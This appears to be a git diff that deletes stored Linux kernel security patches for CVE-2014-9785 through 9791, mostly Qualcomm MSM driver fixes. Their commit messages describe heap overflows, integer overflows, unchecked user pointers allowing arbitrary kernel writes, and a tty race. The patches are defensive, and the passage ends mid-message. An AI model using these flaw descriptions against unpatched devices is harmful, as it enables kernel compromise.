- 	unsigned int bytes_in_buffer = 0;
- 	unsigned int bytes_written;
--	int buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
-+	unsigned int buf_size;
-+	buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
- 
- 	if (diag_dbgfs_table_index >= diag_max_reg) {
- 		/* Done. Reset to prepare for future requests */
-@@ -370,7 +375,7 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- 		pr_err("diag: %s, Error allocating memory\n", __func__);
- 		return -ENOMEM;
- 	}
--
-+	buf_size = ksize(buf);
- 	bytes_remaining = buf_size;
- 
- 	if (diag_dbgfs_table_index == 0) {
-@@ -379,6 +384,7 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- 			"WCNSS: %d, APPS: %d\n",
- 			MODEM_DATA, LPASS_DATA, WCNSS_DATA, APPS_DATA);
- 		bytes_in_buffer += bytes_written;
-+		bytes_remaining -= bytes_written;
- 	}
- 
- 	for (i = diag_dbgfs_table_index; i < diag_max_reg; i++) {
-@@ -422,14 +428,15 @@ static ssize_t diag_dbgfs_read_mempool(struct file *file, char __user *ubuf,
- {
- 	char *buf = NULL;
- 	int ret = 0, i = 0;
--
-+	unsigned int buf_size;
- 	buf = kzalloc(sizeof(char) * DEBUG_BUF_SIZE, GFP_KERNEL);
- 	if (ZERO_OR_NULL_PTR(buf)) {
- 		pr_err("diag: %s, Error allocating memory\n", __func__);
- 		return -ENOMEM;
- 	}
-+	buf_size = ksize(buf);
- 
--	ret = scnprintf(buf, DEBUG_BUF_SIZE,
-+	ret = scnprintf(buf, buf_size,
- 		"POOL_TYPE_COPY: [0x%p : 0x%p] count = %d\n"
- 		"POOL_TYPE_HDLC: [0x%p : 0x%p] count = %d\n"
- 		"POOL_TYPE_USER: [0x%p : 0x%p] count = %d\n"
-@@ -454,7 +461,7 @@ static ssize_t diag_dbgfs_read_mempool(struct file *file, char __user *ubuf,
- 	for (i = 0; i < MAX_HSIC_CH; i++) {
- 		if (!diag_hsic[i].hsic_inited)
- 			continue;
--		ret += scnprintf(buf+ret, DEBUG_BUF_SIZE-ret,
-+		ret += scnprintf(buf+ret, buf_size-ret,
- 				"POOL_TYPE_HSIC_%d: [0x%p : 0x%p] count = %d\n",
- 				i+1,
- 				diag_hsic[i].diag_hsic_pool,
-@@ -465,7 +472,7 @@ static ssize_t diag_dbgfs_read_mempool(struct file *file, char __user *ubuf,
- 	for (i = 0; i < MAX_HSIC_CH; i++) {
- 		if (!diag_hsic[i].hsic_inited)
- 			continue;
--		ret += scnprintf(buf+ret, DEBUG_BUF_SIZE-ret,
-+		ret += scnprintf(buf+ret, buf_size-ret,
- 				"POOL_TYPE_HSIC_%d_WRITE: [0x%p : 0x%p] count = %d\n",
- 				i+1,
- 				diag_hsic[i].diag_hsic_write_pool,
-@@ -484,6 +491,7 @@ static ssize_t diag_dbgfs_read_mempool(struct file *file, char __user *ubuf,
- {
- 	char *buf = NULL;
- 	int ret = 0;
-+	unsigned int buf_size;
- 
- 	buf = kzalloc(sizeof(char) * DEBUG_BUF_SIZE, GFP_KERNEL);
- 	if (ZERO_OR_NULL_PTR(buf)) {
-@@ -491,7 +499,8 @@ static ssize_t diag_dbgfs_read_mempool(struct file *file, char __user *ubuf,
- 		return -ENOMEM;
- 	}
- 
--	ret = scnprintf(buf, DEBUG_BUF_SIZE,
-+	buf_size = ksize(buf);
-+	ret = scnprintf(buf, buf_size,
- 		"POOL_TYPE_COPY: [0x%p : 0x%p] count = %d\n"
- 		"POOL_TYPE_HDLC: [0x%p : 0x%p] count = %d\n"
- 		"POOL_TYPE_USER: [0x%p : 0x%p] count = %d\n"
-@@ -530,10 +539,12 @@ static ssize_t diag_dbgfs_read_bridge(struct file *file, char __user *ubuf,
- 	unsigned int bytes_remaining;
- 	unsigned int bytes_in_buffer = 0;
- 	unsigned int bytes_written;
--	int buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
-+	unsigned int buf_size;
- 	int bytes_hsic_inited = 45;
- 	int bytes_hsic_not_inited = 410;
- 
-+	buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
-+
- 	if (diag_dbgfs_finished) {
- 		diag_dbgfs_finished = 0;
- 		return 0;
-@@ -545,6 +556,7 @@ static ssize_t diag_dbgfs_read_bridge(struct file *file, char __user *ubuf,
- 		return -ENOMEM;
- 	}
- 
-+	buf_size = ksize(buf);
- 	bytes_remaining = buf_size;
- 
- 	/* Only one smux for now */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9785/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9785/ANY/0001.patch
deleted file mode 100644
index d2831804..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9785/ANY/0001.patch
+++ /dev/null
@@ -1,66 +0,0 @@
-From b4338420db61f029ca6713a89c41b3a5852b20ce Mon Sep 17 00:00:00 2001
-From: Hariprasad Dhalinarasimha <hnamgund@codeaurora.org>
-Date: Tue, 1 Oct 2013 18:25:21 -0700
-Subject: qseecom: Change __copy_from_user to copy_from_user
-
-__copy_from_user does not do address check, so use
-copy_from_user instead.
-
-Change-Id: I575c0f3c44b55a521c0d42828988c518c0640a29
-Signed-off-by: Hariprasad Dhalinarasimha <hnamgund@codeaurora.org>
----
- drivers/misc/qseecom.c | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 04fe140..8e9731f 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -431,7 +431,7 @@ static int qseecom_set_client_mem_param(struct qseecom_dev_handle *data,
- 	uint32_t len;
- 
- 	/* Copy the relevant information needed for loading the image */
--	if (__copy_from_user(&req, (void __user *)argp, sizeof(req)))
-+	if (copy_from_user(&req, (void __user *)argp, sizeof(req)))
- 		return -EFAULT;
- 
- 	/* Get the handle of the shared fd */
-@@ -604,7 +604,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp)
- 	struct qseecom_load_app_ireq load_req;
- 
- 	/* Copy the relevant information needed for loading the image */
--	if (__copy_from_user(&load_img_req,
-+	if (copy_from_user(&load_img_req,
- 				(void __user *)argp,
- 				sizeof(struct qseecom_load_img_req))) {
- 		pr_err("copy_from_user failed\n");
-@@ -875,7 +875,7 @@ static int qseecom_send_service_cmd(struct qseecom_dev_handle *data,
- 	struct qseecom_send_svc_cmd_req req;
- 	/*struct qseecom_command_scm_resp resp;*/
- 
--	if (__copy_from_user(&req,
-+	if (copy_from_user(&req,
- 				(void __user *)argp,
- 				sizeof(req))) {
- 		pr_err("copy_from_user failed\n");
-@@ -2086,7 +2086,7 @@ static int qseecom_load_external_elf(struct qseecom_dev_handle *data,
- 	struct qseecom_command_scm_resp resp;
- 
- 	/* Copy the relevant information needed for loading the image */
--	if (__copy_from_user(&load_img_req,
-+	if (copy_from_user(&load_img_req,
- 				(void __user *)argp,
- 				sizeof(struct qseecom_load_img_req))) {
- 		pr_err("copy_from_user failed\n");
-@@ -2248,7 +2248,7 @@ static int qseecom_query_app_loaded(struct qseecom_dev_handle *data,
- 	unsigned long flags = 0;
- 
- 	/* Copy the relevant information needed for loading the image */
--	if (__copy_from_user(&query_req,
-+	if (copy_from_user(&query_req,
- 				(void __user *)argp,
- 				sizeof(struct qseecom_qseos_app_load_query))) {
- 		pr_err("copy_from_user failed\n");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9786/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9786/ANY/0001.patch
deleted file mode 100644
index 4832ad38..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9786/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 2fb303d9c6ca080f253b10ed9384293ca69ad32b Mon Sep 17 00:00:00 2001
-From: Vasko Kalanoski <vaskok@codeaurora.org>
-Date: Tue, 8 Oct 2013 10:50:32 -0700
-Subject: msm: actuator: fix to prevent kernel heap buffer overflow
-
-fix to prevent kernel heap buffer overflow allows user
-controlled data to be written to the heap via the
-msm_camera actuator IOCTLs
-
-Change-Id: I4458831e28e0081fb2f5ae55506be866100e1b4f
-Signed-off-by: Vasko Kalanoski <vaskok@codeaurora.org>
----
- .../platform/msm/camera_v2/sensor/actuator/msm_actuator.c    | 12 ++++++++++--
- 1 file changed, 10 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index baa2db8..e605326 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -79,6 +79,11 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- 	struct msm_camera_i2c_reg_array *i2c_tbl = a_ctrl->i2c_reg_tbl;
- 	CDBG("Enter\n");
- 	for (i = 0; i < size; i++) {
-+		/* check that the index into i2c_tbl cannot grow larger that
-+		the allocated size of i2c_tbl */
-+		if ((a_ctrl->total_steps + 1) < (a_ctrl->i2c_tbl_index)) {
-+			break;
-+		}
- 		if (write_arr[i].reg_write_type == MSM_ACTUATOR_WRITE_DAC) {
- 			value = (next_lens_position <<
- 				write_arr[i].data_shift) |
-@@ -464,8 +469,11 @@ static int32_t msm_actuator_init(struct msm_actuator_ctrl_t *a_ctrl,
- 
- 	a_ctrl->i2c_data_type = set_info->actuator_params.i2c_data_type;
- 	a_ctrl->i2c_client.addr_type = set_info->actuator_params.i2c_addr_type;
--	a_ctrl->reg_tbl_size = set_info->actuator_params.reg_tbl_size;
--	if (a_ctrl->reg_tbl_size > MAX_ACTUATOR_REG_TBL_SIZE) {
-+	if (set_info->actuator_params.reg_tbl_size <=
-+		MAX_ACTUATOR_REG_TBL_SIZE) {
-+		a_ctrl->reg_tbl_size = set_info->actuator_params.reg_tbl_size;
-+	} else {
-+		a_ctrl->reg_tbl_size = 0;
- 		pr_err("MAX_ACTUATOR_REG_TBL_SIZE is exceeded.\n");
- 		return -EFAULT;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9787/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9787/ANY/0001.patch
deleted file mode 100644
index 3385d66e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9787/ANY/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 528400ae4cba715f6c9ff4a2657dafd913f30b8b Mon Sep 17 00:00:00 2001
-From: Hariprasad Dhalinarasimha <hnamgund@codeaurora.org>
-Date: Thu, 3 Oct 2013 16:43:39 -0700
-Subject: qseecom: Validate the incoming length from user space
-
-Check if there is no integer overflow before using req_len and
-resp_len (received from user space). If an overflow is detected
-then exit the operation.
-
-Change-Id: I0459a6992bb3b280db42be63a275c55fa6105b1c
-Signed-off-by: Hariprasad Dhalinarasimha <hnamgund@codeaurora.org>
----
- drivers/misc/qseecom.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 58703cf..1452908 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -961,6 +961,11 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- 		return -EINVAL;
- 	}
- 
-+	if (req->cmd_req_len > UINT_MAX - req->resp_len) {
-+		pr_err("Integer overflow detected in req_len & rsp_len, exiting now\n");
-+		return -EINVAL;
-+	}
-+
- 	reqd_len_sb_in = req->cmd_req_len + req->resp_len;
- 	if (reqd_len_sb_in > data->client.sb_length) {
- 		pr_debug("Not enough memory to fit cmd_buf and "
-@@ -980,7 +985,7 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- 
- 	msm_ion_do_cache_op(qseecom.ion_clnt, data->client.ihandle,
- 					data->client.sb_virt,
--					(req->cmd_req_len + req->resp_len),
-+					reqd_len_sb_in,
- 					ION_IOC_CLEAN_INV_CACHES);
- 
- 	ret = scm_call(SCM_SVC_TZSCHEDULER, 1, (const void *) &send_data_req,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9788/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9788/ANY/0001.patch
deleted file mode 100644
index 6453d7aa..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9788/ANY/0001.patch
+++ /dev/null
@@ -1,194 +0,0 @@
-From 73bfc22aa70cc0b7e6709381125a0a42aa72a4f2 Mon Sep 17 00:00:00 2001
-From: Shiv Maliyappanahalli <smaliyap@codeaurora.org>
-Date: Wed, 2 Oct 2013 17:00:30 -0700
-Subject: ASoC: msm: qdsp6v2: Fix buffer overflow in voice driver
-
-Userspace registers calibration data with acdb driver
-through ioctls. Voice driver registers the calibration
-data with CVD by querying acdb data from acdb driver and
-copies the calibration data in apr message.
-
-The size of the calibration data can be controlled by userspace
-and can result in buffer overflow if the calibration size is
-greater than the destination buffer size.
-
-Reject acdb data if the size is greater than the size of
-destination buffer.
-
-CRs-Fixed: 548872
-Change-Id: I4cd23a38c90b745226ddbc28656c82ff7c10432b
-Signed-off-by: Shiv Maliyappanahalli <smaliyap@codeaurora.org>
----
- sound/soc/msm/qdsp6/q6voice.c   |  9 ++++---
- sound/soc/msm/qdsp6v2/q6voice.c | 53 ++++++++++++++++++++++++++++++++++-------
- 2 files changed, 50 insertions(+), 12 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6/q6voice.c b/sound/soc/msm/qdsp6/q6voice.c
-index 0e53c64..7294350 100644
---- a/sound/soc/msm/qdsp6/q6voice.c
-+++ b/sound/soc/msm/qdsp6/q6voice.c
-@@ -1519,7 +1519,8 @@ static int voice_send_cvs_register_cal_cmd(struct voice_data *v)
- 
- 	/* get the cvs cal data */
- 	get_all_vocstrm_cal(&cal_block);
--	if (cal_block.cal_size == 0)
-+	if (cal_block.cal_size == 0 ||
-+	    cal_block.cal_size > CVS_CAL_SIZE)
- 		goto fail;
- 
- 	if (v == NULL) {
-@@ -1928,7 +1929,8 @@ static int voice_send_cvp_register_cal_cmd(struct voice_data *v)
- 
-       /* get the cvp cal data */
- 	get_all_vocproc_cal(&cal_block);
--	if (cal_block.cal_size == 0)
-+	if (cal_block.cal_size == 0 ||
-+	    cal_block.cal_size > CVP_CAL_SIZE)
- 		goto fail;
- 
- 	if (v == NULL) {
-@@ -2063,7 +2065,8 @@ static int voice_send_cvp_register_vol_cal_table_cmd(struct voice_data *v)
- 	get_all_vocvol_cal(&vol_block);
- 	get_all_vocproc_cal(&voc_block);
- 
--	if (vol_block.cal_size == 0)
-+	if (vol_block.cal_size == 0 ||
-+	    vol_block.cal_size > CVP_CAL_SIZE)
- 		goto fail;
- 
- 	if (v == NULL) {
-diff --git a/sound/soc/msm/qdsp6v2/q6voice.c b/sound/soc/msm/qdsp6v2/q6voice.c
-index 079cc4d..622fae1 100644
---- a/sound/soc/msm/qdsp6v2/q6voice.c
-+++ b/sound/soc/msm/qdsp6v2/q6voice.c
-@@ -1955,20 +1955,22 @@ static int voice_send_cvs_register_cal_cmd(struct voice_data *v)
- 	if (!common.apr_q6_cvs) {
- 		pr_err("%s: apr_cvs is NULL\n", __func__);
- 
--		ret = -EPERM;
-+		ret = -EINVAL;
- 		goto done;
- 	}
- 
- 	if (!common.cal_mem_handle) {
- 		pr_err("%s: Cal mem handle is NULL\n", __func__);
--		ret = -EPERM;
-+
-+		ret = -EINVAL;
- 		goto done;
- 	}
- 
- 	get_vocstrm_cal(&cal_block);
- 	if (cal_block.cal_size == 0) {
- 		pr_err("%s: CVS cal size is 0\n", __func__);
--		ret = -EPERM;
-+
-+		ret = -EINVAL;
- 		goto done;
- 	}
- 
-@@ -1989,6 +1991,15 @@ static int voice_send_cvs_register_cal_cmd(struct voice_data *v)
- 
- 	/* Get the column info corresponding to CVS cal from ACDB. */
- 	get_voice_col_data(VOCSTRM_CAL, &cal_block);
-+	if (cal_block.cal_size == 0 ||
-+	    cal_block.cal_size >
-+	    sizeof(cvs_reg_cal_cmd.cvs_cal_data.column_info)) {
-+		pr_err("%s: Invalid VOCSTRM_CAL size %d\n",
-+		       __func__, cal_block.cal_size);
-+
-+		ret = -EINVAL;
-+		goto done;
-+	}
- 	memcpy(&cvs_reg_cal_cmd.cvs_cal_data.column_info[0],
- 	       (void *) cal_block.cal_kvaddr,
- 	       cal_block.cal_size);
-@@ -2227,20 +2238,22 @@ static int voice_send_cvp_register_cal_cmd(struct voice_data *v)
- 	if (!common.apr_q6_cvp) {
- 		pr_err("%s: apr_cvp is NULL\n", __func__);
- 
--		ret = -EPERM;
-+		ret = -EINVAL;
- 		goto done;
- 	}
- 
- 	if (!common.cal_mem_handle) {
- 		pr_err("%s: Cal mem handle is NULL\n", __func__);
--		ret = -EPERM;
-+
-+		ret = -EINVAL;
- 		goto done;
- 	}
- 
- 	get_vocproc_cal(&cal_block);
- 	if (cal_block.cal_size == 0) {
- 		pr_err("%s: CVP cal size is 0\n", __func__);
--		ret = -EPERM;
-+
-+		ret = -EINVAL;
- 		goto done;
- 	}
- 
-@@ -2261,6 +2274,16 @@ static int voice_send_cvp_register_cal_cmd(struct voice_data *v)
- 
- 	/* Get the column info corresponding to CVP cal from ACDB. */
- 	get_voice_col_data(VOCPROC_CAL, &cal_block);
-+	if (cal_block.cal_size == 0 ||
-+	    cal_block.cal_size >
-+	    sizeof(cvp_reg_cal_cmd.cvp_cal_data.column_info)) {
-+		pr_err("%s: Invalid VOCPROC_CAL size %d\n",
-+		       __func__, cal_block.cal_size);
-+
-+		ret = -EINVAL;
-+		goto done;
-+	}
-+
- 	memcpy(&cvp_reg_cal_cmd.cvp_cal_data.column_info[0],
- 	       (void *) cal_block.cal_kvaddr,
- 	       cal_block.cal_size);
-@@ -2363,20 +2386,22 @@ static int voice_send_cvp_register_vol_cal_cmd(struct voice_data *v)
- 	if (!common.apr_q6_cvp) {
- 		pr_err("%s: apr_cvp is NULL\n", __func__);
- 
--		ret = -EPERM;
-+		ret = -EINVAL;
- 		goto done;
- 	}
- 
- 	if (!common.cal_mem_handle) {
- 		pr_err("%s: Cal mem handle is NULL\n", __func__);
--		ret = -EPERM;
-+
-+		ret = -EINVAL;
- 		goto done;
- 	}
- 
- 	get_vocvol_cal(&cal_block);
- 	if (cal_block.cal_size == 0) {
- 		pr_err("%s: CVP vol cal size is 0\n", __func__);
--		ret = -EPERM;
-+
-+		ret = -EINVAL;
- 		goto done;
- 	}
- 
-@@ -2399,6 +2424,16 @@ static int voice_send_cvp_register_vol_cal_cmd(struct voice_data *v)
- 
- 	/* Get the column info corresponding to CVP volume cal from ACDB. */
- 	get_voice_col_data(VOCVOL_CAL, &cal_block);
-+	if (cal_block.cal_size == 0 ||
-+	    cal_block.cal_size >
-+	    sizeof(cvp_reg_vol_cal_cmd.cvp_vol_cal_data.column_info)) {
-+		pr_err("%s: Invalid VOCVOL_CAL size %d\n",
-+		       __func__, cal_block.cal_size);
-+
-+		ret = -EINVAL;
-+		goto done;
-+	}
-+
- 	memcpy(&cvp_reg_vol_cal_cmd.cvp_vol_cal_data.column_info[0],
- 	       (void *) cal_block.cal_kvaddr,
- 	       cal_block.cal_size);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9789/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9789/ANY/0001.patch
deleted file mode 100644
index 1a5639ba..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9789/ANY/0001.patch
+++ /dev/null
@@ -1,105 +0,0 @@
-From 5720ed5c3a786e3ba0a2428ac45da5d7ec996b4e Mon Sep 17 00:00:00 2001
-From: Gopikrishnaiah Anandan <agopik@codeaurora.org>
-Date: Fri, 16 Aug 2013 17:34:21 -0400
-Subject: Soc: msm: qdsp6v2: Fix invalid params handling
-
-Alloc and free apis should sanity check all input params.
-If allocation fails set client and ion handle to NULL.
-
-Change-Id: Ide3bd782eb90ee8b033e39de232929a1ca7174b7
-Signed-off-by: Gopikrishnaiah Anandan <agopik@codeaurora.org>
----
- arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c | 30 +++++++++++++++++++++++++-----
- 1 file changed, 25 insertions(+), 5 deletions(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c b/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c
-index 0c71659..f9e9d6d 100644
---- a/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c
-+++ b/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c
-@@ -53,7 +53,11 @@ int msm_audio_ion_alloc(const char *name, struct ion_client **client,
- 		pr_debug("%s:probe is not done, deferred\n", __func__);
- 		return -EPROBE_DEFER;
- 	}
--
-+	if (!name || !client || !handle || !paddr || !vaddr
-+		|| !bufsz || !pa_len) {
-+		pr_err("%s: Invalid params\n", __func__);
-+		return -EINVAL;
-+	}
- 	*client = msm_audio_ion_client_create(UINT_MAX, name);
- 	if (IS_ERR_OR_NULL((void *)(*client))) {
- 		pr_err("%s: ION create client for AUDIO failed\n", __func__);
-@@ -102,9 +106,9 @@ int msm_audio_ion_alloc(const char *name, struct ion_client **client,
- 
- err_ion_handle:
- 	ion_free(*client, *handle);
--	*handle = NULL;
- err_ion_client:
- 	msm_audio_ion_client_destroy(*client);
-+	*handle = NULL;
- 	*client = NULL;
- err:
- 	return -EINVAL;
-@@ -116,10 +120,17 @@ int msm_audio_ion_import(const char *name, struct ion_client **client,
- 			ion_phys_addr_t *paddr, size_t *pa_len, void **vaddr)
- {
- 	int rc = 0;
-+	if (!name || !client || !handle || !ionflag || !paddr || !vaddr
-+		|| !bufsz || !pa_len) {
-+		pr_err("%s: Invalid params\n", __func__);
-+		rc = -EINVAL;
-+		goto err;
-+	}
- 
- 	*client = msm_audio_ion_client_create(UINT_MAX, name);
- 	if (IS_ERR_OR_NULL((void *)(*client))) {
- 		pr_err("%s: ION create client for AUDIO failed\n", __func__);
-+		rc = -EINVAL;
- 		goto err;
- 	}
- 
-@@ -132,8 +143,9 @@ int msm_audio_ion_import(const char *name, struct ion_client **client,
- 	if (IS_ERR_OR_NULL((void *) (*handle))) {
- 		pr_err("%s: ion import dma buffer failed\n",
- 				__func__);
--		goto err_ion_handle;
--		}
-+		rc = -EINVAL;
-+		goto err_destroy_client;
-+	}
- 
- 	if (ionflag != NULL) {
- 		rc = ion_handle_get_flags(*client, *handle, ionflag);
-@@ -154,6 +166,7 @@ int msm_audio_ion_import(const char *name, struct ion_client **client,
- 	*vaddr = ion_map_kernel(*client, *handle);
- 	if (IS_ERR_OR_NULL((void *)*vaddr)) {
- 		pr_err("%s: ION memory mapping for AUDIO failed\n", __func__);
-+		rc = -ENOMEM;
- 		goto err_ion_handle;
- 	}
- 	pr_debug("%s: mapped address = %p, size=%d\n", __func__, *vaddr, bufsz);
-@@ -162,13 +175,20 @@ int msm_audio_ion_import(const char *name, struct ion_client **client,
- 
- err_ion_handle:
- 	ion_free(*client, *handle);
-+err_destroy_client:
- 	msm_audio_ion_client_destroy(*client);
-+	*client = NULL;
-+	*handle = NULL;
- err:
--	return -EINVAL;
-+	return rc;
- }
- 
- int msm_audio_ion_free(struct ion_client *client, struct ion_handle *handle)
- {
-+	if (!client || !handle) {
-+		pr_err("%s Invalid params\n", __func__);
-+		return -EINVAL;
-+	}
- 	if (msm_audio_ion_data.smmu_enabled) {
- 		/* Need to populate book kept infomation */
- 		pr_debug("client=%p, domain=%p, domain_id=%d, group=%p",
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9790/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9790/ANY/0001.patch
deleted file mode 100644
index 2ff79139..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9790/ANY/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From 6ed921bda8cbb505e8654dfc1095185b0bccc38e Mon Sep 17 00:00:00 2001
-From: Raviv Shvili <rshvili@codeaurora.org>
-Date: Tue, 1 Oct 2013 17:18:29 +0300
-Subject: mmc: core : fix arbitrary read/write to user space
-
-In the MMC card debug_fs the read and write handlers use the strlcat
-and sscanf, without checking the pointer given.
-Since the pointer is not checked it is possible to write
-everywhere (ring 0 or 3).
-In order to fix it, an access_ok function is being used to verify
-the buffer's pointer supplied by user is valid.
-
-CRs-fixed: 545716
-Change-Id: Ia710b6af5a95974fc930ca902e8ff18afa4e17ba
-Signed-off-by: Raviv Shvili <rshvili@codeaurora.org>
----
- drivers/mmc/core/debugfs.c | 10 ++++++++++
- 1 file changed, 10 insertions(+)
-
-diff --git a/drivers/mmc/core/debugfs.c b/drivers/mmc/core/debugfs.c
-index 903decf..9897f9f 100644
---- a/drivers/mmc/core/debugfs.c
-+++ b/drivers/mmc/core/debugfs.c
-@@ -15,6 +15,7 @@
- #include <linux/slab.h>
- #include <linux/stat.h>
- #include <linux/fault-inject.h>
-+#include <linux/uaccess.h>
- 
- #include <linux/mmc/card.h>
- #include <linux/mmc/host.h>
-@@ -392,6 +393,9 @@ static ssize_t mmc_wr_pack_stats_read(struct file *filp, char __user *ubuf,
- 	if (!card)
- 		return cnt;
- 
-+	if (!access_ok(VERIFY_WRITE, ubuf, cnt))
-+		return cnt;
-+
- 	if (!card->wr_pack_stats.print_in_read)
- 		return 0;
- 
-@@ -532,6 +536,9 @@ static ssize_t mmc_wr_pack_stats_write(struct file *filp,
- 	if (!card)
- 		return cnt;
- 
-+	if (!access_ok(VERIFY_READ, ubuf, cnt))
-+		return cnt;
-+
- 	sscanf(ubuf, "%d", &value);
- 	if (value) {
- 		mmc_blk_init_packed_statistics(card);
-@@ -571,6 +578,9 @@ static ssize_t mmc_bkops_stats_read(struct file *filp, char __user *ubuf,
- 	if (!card)
- 		return cnt;
- 
-+	if (!access_ok(VERIFY_WRITE, ubuf, cnt))
-+		return cnt;
-+
- 	bkops_stats = &card->bkops_info.bkops_stats;
- 
- 	if (!bkops_stats->print_stats)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9790/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-9790/ANY/0002.patch
deleted file mode 100644
index cd6b4669..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9790/ANY/0002.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 9bc30c0d1832f7dd5b6fa10d5e48a29025176569 Mon Sep 17 00:00:00 2001
-From: Raviv Shvili <rshvili@codeaurora.org>
-Date: Thu, 31 Oct 2013 17:38:19 +0200
-Subject: mmc: core : fix arbitrary read/write to user space
-
-In the MMC card debug_fs the read and write handlers use the strlcat
-and sscanf, without checking the pointer given.
-Since the pointer is not checked it is possible to write
-everywhere (ring 0 or 3).
-In order to fix it, an access_ok function is being used to verify
-the buffer's pointer supplied by user is valid.
-
-CRs-fixed: 545716
-
-Change-Id: I13ca736337fefe29ff9b0df6a318e7d92240f8b2
-Signed-off-by: Raviv Shvili <rshvili@codeaurora.org>
----
- drivers/mmc/core/debugfs.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/mmc/core/debugfs.c b/drivers/mmc/core/debugfs.c
-index 9897f9f..4ec8941 100644
---- a/drivers/mmc/core/debugfs.c
-+++ b/drivers/mmc/core/debugfs.c
-@@ -647,6 +647,9 @@ static ssize_t mmc_bkops_stats_write(struct file *filp,
- 	if (!card)
- 		return cnt;
- 
-+	if (!access_ok(VERIFY_READ, ubuf, cnt))
-+		return cnt;
-+
- 	bkops_stats = &card->bkops_info.bkops_stats;
- 
- 	sscanf(ubuf, "%d", &value);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9791/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9791/ANY/0001.patch
deleted file mode 100644
index b7c78569..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9791/ANY/0001.patch
+++ /dev/null
@@ -1,83 +0,0 @@
-From 9aabfc9e7775abbbcf534cdecccc4f12ee423b27 Mon Sep 17 00:00:00 2001
-From: Peter Hurley <peter@hurleysoftware.com>
-Date: Tue, 13 May 2014 14:36:46 -0700
-Subject: n_tty: Fix n_tty_write crash when echoing in raw mode
-
-The tty atomic_write_lock does not provide an exclusion guarantee for
-the tty driver if the termios settings are LECHO & !OPOST. And since
-it is unexpected and not allowed to call TTY buffer helpers like
-tty_insert_flip_string concurrently, this may lead to crashes when
-concurrect writers call pty_write. In that case the following two
-writers:
-* the ECHOing from a workqueue and
-* pty_write from the process
-race and can overflow the corresponding TTY buffer like follows.
-
-If we look into tty_insert_flip_string_fixed_flag, there is:
-  int space = __tty_buffer_request_room(port, goal, flags);
-  struct tty_buffer *tb = port->buf.tail;
-  ...
-  memcpy(char_buf_ptr(tb, tb->used), chars, space);
-  ...
-  tb->used += space;
-
-so the race of the two can result in something like this:
-          A                             B
-   __tty_buffer_request_room
-                                  __tty_buffer_request_room
-   memcpy(buf(tb->used), ...)
-   tb->used += space;
-                                 memcpy(buf(tb->used), ...) ->BOOM
-
-B's memcpy is past the tty_buffer due to the previous A's tb->used
-increment.
-
-Since the N_TTY line discipline input processing can output
-concurrently with a tty write, obtain the N_TTY ldisc output_lock to
-serialize echo output with normal tty writes. This ensures the tty
-buffer helper tty_insert_flip_string is not called concurrently and
-everything is fine.
-
-Note that this is nicely reproducible by an ordinary user using
-forkpty and some setup around that (raw termios + ECHO). And it is
-present in kernels at least after commit
